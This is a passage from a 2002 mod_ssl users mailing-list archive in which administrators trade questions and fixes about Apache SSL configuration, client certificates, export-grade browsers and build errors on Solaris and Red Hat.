aodhan@domain.net DocumentRoot /www/domain.net/ssl ServerName server.domain.net ErrorLog logs/443error_log CustomLog logs/443access_log common ScriptAlias /cgi-bin/ "/usr/local/apache/cgi-bin/" Group users AuthName "ssl" AuthType Basic AuthUserFile auth/.htpasswd Require user aodhan SSLVerifyClient require SSLVerifyDepth 1 SSLRequireSSLA -- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Aodhan H. - - - - - - - - - - - - - - - - Ad Astra per Aspera A Rough Road Leads To The Stars - - - - - - - - - - - - - - - - Freedom is something you have, not something you're given. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 30 11:47:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA27686; Wed, 30 Jan 2002 11:46:20 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from pascal.arago.de id LAA27673; Wed, 30 Jan 2002 11:46:01 +0100 (MET) Received: Received: (from uucp@localhost) by pascal.arago.de id g0UAjxt3157029 for modssl-users@modssl.org; Wed, 30 Jan 2002 11:45:59 +0100 (MET) Received: from UNKNOWN(194.153.130.2), claiming to be "carat.arago.de" via SMTP by pascal.arago.de, id smtpdAAAa0C1OH; Wed Jan 30 11:45:58 2002 Received: from ohm.arago.de (localhost [127.0.0.1]) by carat.arago.de (8.9.3/8.9.3) with SMTP id LAA19210 for ; Wed, 30 Jan 2002 11:45:03 +0100 (MET) Received: (from gryf@localhost) by ohm.arago.de (SGI-8.9.3/8.9.3) id LAA27680 for modssl-users@modssl.org; Wed, 30 Jan 2002 11:45:18 +0100 (MET) Date: Wed, 30 Jan 2002 11:45:18 +0100 From: Thomas Binder To: modssl-users@modssl.org Subject: Re: ensure 128 bit encryption Message-ID: <20020130114518.A7935051@ohm.arago.de> Mail-Followup-To: modssl-users@modssl.org References: <20020121184917.A6497449@ohm.arago.de> <11131.1012208420@www56.gmx.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <11131.1012208420@www56.gmx.net>; from hekiman@gmx.at on Mon, Jan 28, 2002 at 10:00:20AM +0100 Organization: arago GmbH Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Thomas Binder X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi! On Mon, Jan 28, 2002 at 10:00:20AM +0100, hekiman@gmx.at wrote: > > Try the following (inside ... > > > SSLOptions +StdEnvVars > > RewriteBase absolute-filesystem-path-to-directory > > RewriteCond %{ENV:SSL_CIPHER_EXPORT} "^true$" > > RewriteRule ".*" /noexport.html > > nice try, but we have another problem. we use a global > certificate, so export browsers have! 128 bit. only very old > browsers use <128 bit. so this also doesn't work. Sorry, I don't get your point. SSL_CIPHER_EXPORT is only set when a client connects using a crippled cipher. An export browser accessing a global site certificate will of course not cause SSL_CIPHER_EXPORT to be set. If you mean something else, please explain in more detail. Ciao Thomas -- If you don't drink it, someone else will. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 30 13:45:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA03940; Wed, 30 Jan 2002 13:44:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id NAA03850; Wed, 30 Jan 2002 13:43:09 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 1BD8F4CE698; Wed, 30 Jan 2002 13:43:09 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g0UCdwA64187; Wed, 30 Jan 2002 13:39:58 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id MAA00122; Wed, 30 Jan 2002 12:11:15 +0100 (MET) Date: Wed, 30 Jan 2002 12:11:15 +0100 (MET) Message-Id: <200201301111.MAA00122@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: [BugDB] Problem with Opera 6.0 (PR#662) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Full_Name: Roman Y. Shibrick Version: 2.8.5 OS: FreeBSD 4.4-stable Submission from: (NULL) (212.188.123.131) 1. I use Apache-1.3.22+mod_ssl_2.8.5+mod_perl+HTML-Embperl-1.3.4. 2. There is a following code: [- open FILE, "> /tmp/$filename"; print FILE $buffer while read( $fdat{myUploadObject}, $buffer, 32768 ); close FILE; -] ....
... ...
3. I work with the form. I send file ~150K. 4. Opera inform: Connection refused. Log: mod_ssl: SSL error on reading data ( OpenSSL library error follow ) OpenSSL: error:1408F10B:SSL routines:SSL3_GET_RECORD: wrong version number 5. # openssl version OpenSSL 0.9.6a 5 Apr. 2001 6. If I use IE 5.5 or Nescape Communicator 4.79 the given error does not arise. 7. If I unload a file of the small size the given error does not arise. Whot IS IT? ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 30 14:57:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA07150; Wed, 30 Jan 2002 14:56:32 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from owl4.owl.co.uk id OAA07140; Wed, 30 Jan 2002 14:56:03 +0100 (MET) Received: from owl.co.uk (ferret.owl.co.uk [192.168.150.61]) by owl4.owl.co.uk (Rockliffe SMTPRA 3.4.2) with ESMTP id for ; Wed, 30 Jan 2002 13:53:04 +0000 Message-ID: <3C57FABE.8090501@owl.co.uk> Date: Wed, 30 Jan 2002 13:53:02 +0000 From: Colm McCartan Organization: OWL User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.4) Gecko/20011019 Netscape6/6.2 X-Accept-Language: en-us MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Client X509 Certificate import in Netscape 6.2 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Colm McCartan X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello all, Thanks to a previous post on here with regard to IE client certificates (http://marc.theaimsgroup.com/?l=openssl-users&m=100320729122227&q=raw), we were able to successfully import certificates to IE and set up full client verification over SSL using openssl and Apache/modSSL - anyone needing help with this please feel free to mail me. However, we have a problem achieving the same in Netscape 6.2 - I have seen a few snippets here and there, mostly relating to older versions of Communicator, that suggest the browser can only import keys via http (?!) with an appropriate MIME type set. I have also seen reference to a custom tag that gets the browser to generate a keypair and produce a CSR. There doesn't seem to be a simple import option in the Certificate Manager. We'll obviously have a problem importing the CA root certificate also. On a related note, when the browser is refused access to the SSL site, a nasty-looking dialog comes up saying an unidentified SSL error (-12227) has occurred - is there a way to trap this and maybe give a more friendly/informative response or a redirect? Any clues gratefully accepted, colm ................................................................ colm mccartan panasonic owl uk colmm@owl.co.uk (44) 131 561 1035 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 30 16:24:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA11747; Wed, 30 Jan 2002 16:24:01 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from owl4.owl.co.uk id QAA11683; Wed, 30 Jan 2002 16:22:26 +0100 (MET) Received: from owl.co.uk (ferret.owl.co.uk [192.168.150.61]) by owl4.owl.co.uk (Rockliffe SMTPRA 3.4.2) with ESMTP id for ; Wed, 30 Jan 2002 15:19:19 +0000 Message-ID: <3C580EF5.6090208@owl.co.uk> Date: Wed, 30 Jan 2002 15:19:17 +0000 From: Colm McCartan Organization: OWL User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.4) Gecko/20011019 Netscape6/6.2 X-Accept-Language: en-us MIME-Version: 1.0 To: modssl-users@modssl.org Subject: FIXED! Client X509 Certificate import in Netscape 6.2 References: <3C57FABE.8090501@owl.co.uk> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Colm McCartan X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Replying to my own question, but for the archive... The same PKCS12 file used for importing to IE can be used to import the client PKCS record to NS (at least 6.2 - a colleague is getting an unspecified error with 6.1)... Simplpy use the (slightly misnamed) Restore button in the Certificate Manager to browse to the .p12 file - after importing the root CA by drag and drop or the same process. Still interested in the associated problem: > On a related note, when the browser is refused access to the SSL site, a > nasty-looking dialog comes up saying an unidentified SSL error (-12227) > has occurred - is there a way to trap this and maybe give a more > friendly/informative response or a redirect? Cheers, colm ................................................................ colm mccartan panasonic owl uk colmm@owl.co.uk (44) 131 561 1035 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 30 17:46:29 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA15157; Wed, 30 Jan 2002 17:45:50 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from teamsite.vacation-corp.com id RAA15114; Wed, 30 Jan 2002 17:45:12 +0100 (MET) Received: from ARONTHAL.amadeusboston.com ([192.168.1.157]) by teamsite.vacation-corp.com (8.9.3+Sun/8.9.1) with ESMTP id LAA04000; Wed, 30 Jan 2002 11:45:12 -0500 (EST) Message-Id: <5.1.0.14.2.20020130114432.02a82298@192.168.1.14> X-Sender: aronthal@192.168.1.14 X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Wed, 30 Jan 2002 11:45:09 -0500 To: modssl-users@modssl.org, "R. DuFresne" From: Adam Ronthal Subject: Re: Problem installing mod_ssl on Solaris 8 Cc: In-Reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Adam Ronthal X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I had to add the following to my apachectl script to get it going: LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/lib:/usr/local/ssl/lib export LD_LIBRARY_PATH Hope that helps.... -Adam At 05:14 PM 1/29/2002 -0400, LDC - Alan Mizrahi wrote: >Thanks, I read in the archives that Matt Goyer had a similar problem, but >I think its not the same cause. >His problem was that the runtime linker didn't find the >dynamic openssl library, my problem is that the symbol "ap_user_id" >referenced in libssl.so isn't found in any library. >I think the ap_* symbols are defined in Apache core, so I don't know >what's wrong. >Can somebody help me solve this problem? > > >Regards, > > Alan Mizrahi > Universidad Simon Bolivar > Laboratorio de Computacion > alan@ldc.usb.ve > >On Tue, 29 Jan 2002, R. DuFresne wrote: > > > > > try updateing ld.so to locate the lib, this was covered just this week in > > the list. man ld.so.1 should point you in the proper direction. Also, > > there was a sugestion one can create a sym link to the share lib paths > > known to sunOS, from tthe special place folks like to place apache's > > libssl.so file. Either one should work. > > > > Thanks, > > > > Ron DuFresne > > > > On Tue, 29 Jan 2002, LDC - Alan Mizrahi wrote: > > > > > > > > Hello, I have a problem installing apache-1.3.22 with mod_ssl 2.8.5 > > > (DSO) on Solaris 8 (sparc). > > > I get the following error starting apache: > > > Syntax error on line 206 of /usr/local/apache-1.3.22/conf/httpd.conf: > > > Cannot load /usr/local/apache-1.3.22/arch/libexec/libssl.so into server: > > > ld.so.1: /usr/local/apache-1.3.22/arch/bin/httpd: fatal: relocation > > > error: file /usr/local/apache-1.3.22/arch/libexec/libssl.so: symbol > > > ap_user_id: referenced symbol not found > > > /etc/init.d/httpd startssl: httpd could not be started > > > > > > I am have gcc-2.95.3 using GNU's ld and as (binutils-2.11). > > > To install apache I did the following: > > > > > > - I installed mm-1.1.3 like this: > > > ./configure --prefix=/usr/local/libmm-1.1.3 \ > > > --exec-prefix=/usr/local/libmm-1.1.3/arch > > > make > > > make install > > > > > > - I installed openssl-0.9.6c like this: > > > I modified the config script to force gcc instead of cc > > > ./config --prefix=/usr/local/openssl-0.9.6c/arch \ > > > --openssldir=/usr/local/openssl-0.9.6c/ssl no-idea \ > > > no-threads shared -fPIC > > > make > > > make install > > > > > > - I installed apache-1.3.22 and mod_ssl-2.8.5 like this: > > > tar -xzf apache_1.3.22.tar.gz > > > tar -xzf mod_ssl-2.8.5-1.3.22.tar.gz > > > cd mod_ssl-2.8.5-1.3.22 > > > ./configure --with-apache=../apache_1.3.22 > > > cd ../apache_1.3.22 > > > EAPI_MM=SYSTEM SSL_BASE=SYSTEM ./configure \ > > > --prefix=/usr/local/apache-1.3.22 \ > > > --exec-prefix=/usr/local/apache-1.3.22/arch \ > > > --enable-module=rewrite --enable-module=so \ > > > --enable-shared=ssl --enable-module=ssl > > > make > > > make install > > > > > > > > > Previous search of this error led me to use -fPIC when configuring > > > openssl and using only static libraries of openssl, it didn't work > either. > > > When I run ldd -r libssl.so I find that many "ap_*" symbols that aren't > > > found. > > > Am I missing something here? > > > > > > Thanks for your help. > > > > > > Regards, > > > > > > Alan Mizrahi > > > Universidad Simon Bolivar > > > Laboratorio de Computacion > > > alan@ldc.usb.ve > > > > > > > > > ______________________________________________________________________ > > > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > > > User Support Mailing List modssl-users@modssl.org > > > Automated List Manager majordomo@modssl.org > > > > > > > -- > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > > admin & senior security consultant: sysinfo.com > > http://sysinfo.com > > > > "Cutting the space budget really restores my faith in humanity. It > > eliminates dreams, goals, and ideals and lets us get straight to the > > business of hate, debauchery, and self-annihilation." > > -- Johnny Hart > > > > testing, only testing, and damn good at it too! > > > > > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 30 19:39:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA21033; Wed, 30 Jan 2002 19:38:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id TAA21009; Wed, 30 Jan 2002 19:37:53 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 1BE834CE617; Wed, 30 Jan 2002 19:37:53 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g0UIZP500479; Wed, 30 Jan 2002 19:35:25 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from cgs_server.columba.com id RAA14508; Wed, 30 Jan 2002 17:27:06 +0100 (MET) Received: by CGS_SERVER with Internet Mail Service (5.5.2650.21) id ; Wed, 30 Jan 2002 16:27:00 -0000 Message-ID: <29020456E862D411A043001083FC1BD3387ABF@CGS_SERVER> From: Warren Macken To: "'modssl-users@modssl.org'" Subject: Setup help Date: Wed, 30 Jan 2002 16:26:59 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C1A9AA.F1173910" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Warren Macken X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_001_01C1A9AA.F1173910 Content-Type: text/plain; charset="iso-8859-1" I have RH 7.1 server with Apache 1.3 installed and running,I need to get SSL up and running.I have mod_ssl downloaded and ready to install but I want to check what the is the best procedure first. 1: Where do I install mod_ssl and how do I configure to incorporate the super cert. I have purchased from Thawte ? 2: do I need to install openss ? Thanks ------_=_NextPart_001_01C1A9AA.F1173910 Content-Type: text/html; charset="iso-8859-1"
I have RH 7.1 server with Apache 1.3 installed and running,I need to get SSL up and running.I have mod_ssl downloaded and ready to install but I want to check what the is the best procedure first.
 
1: Where do I install mod_ssl and how do I configure to incorporate the super cert. I have purchased from Thawte ?
2: do I need to install openss ?
 
Thanks

 

------_=_NextPart_001_01C1A9AA.F1173910-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 30 21:24:21 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA25616; Wed, 30 Jan 2002 21:23:15 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id VAA25549; Wed, 30 Jan 2002 21:21:46 +0100 (MET) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id PAA28752; Wed, 30 Jan 2002 15:27:22 -0500 Date: Wed, 30 Jan 2002 15:27:22 -0500 (EST) From: "R. DuFresne" To: Warren Macken cc: "'modssl-users@modssl.org'" Subject: Re: Setup help In-Reply-To: <29020456E862D411A043001083FC1BD3387ABF@CGS_SERVER> Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... X-Admonition: The Good thing about potential is X-Admonition2: as long as you do nothing X-Admonition3: you'll always have it. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Your best course would be to untar that modssl sourceball and read the documentation. Thanks, Ron DuFresne On Wed, 30 Jan 2002, Warren Macken wrote: > I have RH 7.1 server with Apache 1.3 installed and running,I need to get SSL > up and running.I have mod_ssl downloaded and ready to install but I want to > check what the is the best procedure first. > > 1: Where do I install mod_ssl and how do I configure to incorporate the > super cert. I have purchased from Thawte ? > 2: do I need to install openss ? > > Thanks > > > > -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 30 21:27:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA25842; Wed, 30 Jan 2002 21:26:24 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from saratoga.terran.net id VAA25805; Wed, 30 Jan 2002 21:25:42 +0100 (MET) Received: from localhost (saratoga.terran.net [127.0.0.1]) by saratoga.terran.net (Postfix) with ESMTP id A65FE4005 for ; Wed, 30 Jan 2002 13:19:07 -0800 (PST) Date: Wed, 30 Jan 2002 13:19:07 -0800 (PST) From: Aodhan H To: : ; Subject: RE: ssl no response In-Reply-To: <31A657F37655D111B31300A0C955187501C21C22@ZIRCON> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Aodhan H X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I've changed the conf now to see: SSLEngine on SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL SSLCertificateFile /usr/local/apache/conf/ssl.crt/server.crt SSLCertificateKeyFile /usr/local/apache/conf/ssl.key/server.key ServerAdmin aodhan@terran.net DocumentRoot /www/domain.net/ssl ServerName domain.net ErrorLog logs/443error_log CustomLog logs/443access_log common ScriptAlias /cgi-bin/ "/usr/local/apache/cgi-bin/" Group users AuthName "ssl" AuthType Basic AuthUserFile auth/.htpasswd Require user aodhan SSLVerifyClient require SSLVerifyDepth 1 SSLRequireSSL When I test (debug) it succedes to local host, but not to the actual virtual host. # openssl s_client -connect ssl.domain.net:443 -state -debug connect: Connection refused connect:errno=111 # openssl s_client -connect localhost:443 -state -debug CONNECTED(00000003) I have the listen 443 statment included, just inside Section 2: Listen 80 Listen 443 Looking into the ssl_engine_log, I see the following error: [30/Jan/2002 13:13:26 28201] [warn] Init: (saratoga.domain.net:443) RSA server certificate CommonName (CN) `www.domain.net' does NOT match server name!? [30/Jan/2002 13:13:26 28201] [info] Init: Configuring server domain.net:443 for SSL protocol [30/Jan/2002 13:13:26 28201] [warn] Init: (domain.net:443) RSA server certificate CommonName (CN) `www.domain.net' does NOT match server name!? -- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Aodhan H. - - - - - - - - - - - - - - - - Ad Astra per Aspera A Rough Road Leads To The Stars - - - - - - - - - - - - - - - - Freedom is something you have, not something you're given. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 30 21:35:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA26192; Wed, 30 Jan 2002 21:34:25 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from rock.visionshareinc.com id VAA26159; Wed, 30 Jan 2002 21:33:55 +0100 (MET) Received: from visionshareinc.com (IDENT:plp@fuji.visionshareinc.com [10.1.100.11]) by rock.visionshareinc.com (8.11.2/8.11.2) with ESMTP id g0UKXna07188 for ; Wed, 30 Jan 2002 14:33:49 -0600 Message-ID: <3C585867.4407F996@visionshareinc.com> Date: Wed, 30 Jan 2002 14:32:39 -0600 From: Pete Palmer Organization: Building Trusted Communities on the Internet X-Mailer: Mozilla 4.77 [en] (X11; U; Linux 2.4.2-2 i686) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Setup help References: <29020456E862D411A043001083FC1BD3387ABF@CGS_SERVER> Content-Type: multipart/alternative; boundary="------------1B869DEE6F892315C1A51679" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Pete Palmer X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users --------------1B869DEE6F892315C1A51679 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit mod_ssl is pre-packaged with with RH 7.1. The config items are in the /etc/httpd/conf/httpd.conf file, starting with: SSLEngine on When you say your "super cert" I'm guessing you mean your server cert. You need to put that cert in the /etc/httpd/conf/ssl.crt directory (and then run the 'make' command there), and then put your cert's corresponding private key file in the /etc/httpd/conf/ssl.key directory. Then, in your /etc/httpd/conf/httpd.conf file, you need to edit these two lines to point to your new cert and its key: SSLCertificateFile /etc/httpd/conf/ssl.crt/your-thawte-server-cert-filename.crt SSLCertificateKeyFile /etc/httpd/conf/ssl.key/your-thawte-cert-private-key-filename.key Then, run /etc/init.d/httpd restart You should be able to see your default home page using https://your.site.name/ rather than http://your.site.name/ Warren Macken wrote: > I have RH 7.1 server with Apache 1.3 installed and running,I need to > get SSL up and running.I have mod_ssl downloaded and ready to install > but I want to check what the is the best procedure first.1: Where do I > install mod_ssl and how do I configure to incorporate the super cert. > I have purchased from Thawte ?2: do I need to install openss ?Thanks -- Pete Palmer (pete.palmer@visionshareinc.com) --------------1B869DEE6F892315C1A51679 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit  
 mod_ssl is pre-packaged with with RH 7.1.  The config items are in the /etc/httpd/conf/httpd.conf file, starting with:

SSLEngine on

When you say your "super cert" I'm guessing you mean your server cert.  You need to put that cert in the /etc/httpd/conf/ssl.crt directory (and then run the 'make' command there), and then put your cert's corresponding private key file in the /etc/httpd/conf/ssl.key directory.

Then, in your /etc/httpd/conf/httpd.conf file, you need to edit these two lines to point to your new cert and its key:

SSLCertificateFile /etc/httpd/conf/ssl.crt/your-thawte-server-cert-filename.crt
SSLCertificateKeyFile /etc/httpd/conf/ssl.key/your-thawte-cert-private-key-filename.key

Then, run

/etc/init.d/httpd restart

You should be able to see your default home page using https://your.site.name/ rather than http://your.site.name/
 

Warren Macken wrote:

I have RH 7.1 server with Apache 1.3 installed and running,I need to get SSL up and running.I have mod_ssl downloaded and ready to install but I want to check what the is the best procedure first.1: Where do I install mod_ssl and how do I configure to incorporate the super cert. I have purchased from Thawte ?2: do I need to install openss ?Thanks
-- 
Pete Palmer (pete.palmer@visionshareinc.com)

--------------1B869DEE6F892315C1A51679-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Jan 31 13:00:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA13662; Thu, 31 Jan 2002 12:59:23 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id MAA13643; Thu, 31 Jan 2002 12:58:47 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id C42654CE53D; Thu, 31 Jan 2002 12:58:46 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g0VBv2t27118; Thu, 31 Jan 2002 12:57:02 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail.capgemini.nl id KAA06315; Thu, 31 Jan 2002 10:41:30 +0100 (MET) Received: from exchange_test.capgemini.nl (techneticum.capgemini.nl [194.229.163.69]) by mail.capgemini.nl (8.11.1/8.11.1) with ESMTP id g0V9fOE11466 for ; Thu, 31 Jan 2002 10:41:24 +0100 (MET) Received: by techneticum.capgemini.nl with Internet Mail Service (5.5.2653.19) id ; Thu, 31 Jan 2002 10:38:50 +0100 Received: from mail1.capgemini.nl (krypton.capgemini.nl [193.78.92.63]) by exchange_test.capgemini.nl with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id K7T40BT1; Thu, 31 Jan 2002 10:38:47 +0100 Received: from y02321 ([192.168.47.99]) by mail1.capgemini.nl (8.10.1/8.10.1) with SMTP id g0V9fIf04653 for ; Thu, 31 Jan 2002 10:41:19 +0100 (MET) Message-ID: From: Lennert de Waal To: modssl-users@modssl.org Subject: Client certificates and known msie 4 / 5.5 errors and SSLv2 Date: Thu, 31 Jan 2002 10:38:13 +0100 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Lennert de Waal X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, I know this topic has been covered before but I have some strange experiences and couldn't find a resolution. I'm using redhat 6.2 with Apache and mod_ssl configured. I have the known problems which prevent msie export versions (40 and 56 bit) from connecting to the server using SSL, but I'm able to solve this (for 99% of the clients) by adding the SSLProtocol -SSLv3 parameter. When I add the SSLVerifyClient optional parameter to check whether a client has a certificate and when not present a username/password challenge form a .htaccess file, no MSIE client can connect. I have to remove the "SSLProtocol -SSLv3" parameter to gain access but when I do that, export versions of MSIE can not connect anymore... Does anybody know if ClientCertificates checking can only be done when enabling SSLv3? Thanks for reading, I hope the post is clear enough! Sorry for the corp. sig. Lennert de Waal - the Netherlands -- **************************************************************************** This message contains information that may be privileged or confidential and is the property of the Cap Gemini Ernst & Young Group. It is only intended for the person to whom it is addressed. If you are not the intended recipient, you are not authorized to read, print, retain, copy disseminate, distribute, or use this message or any part thereof. If you receive this message in error, please notify the sender immediately and delete all copies of this message. **************************************************************************** ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Jan 31 16:20:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA21852; Thu, 31 Jan 2002 16:19:15 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id QAA21816; Thu, 31 Jan 2002 16:18:31 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 4A3A64CE73C; Thu, 31 Jan 2002 16:18:30 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for 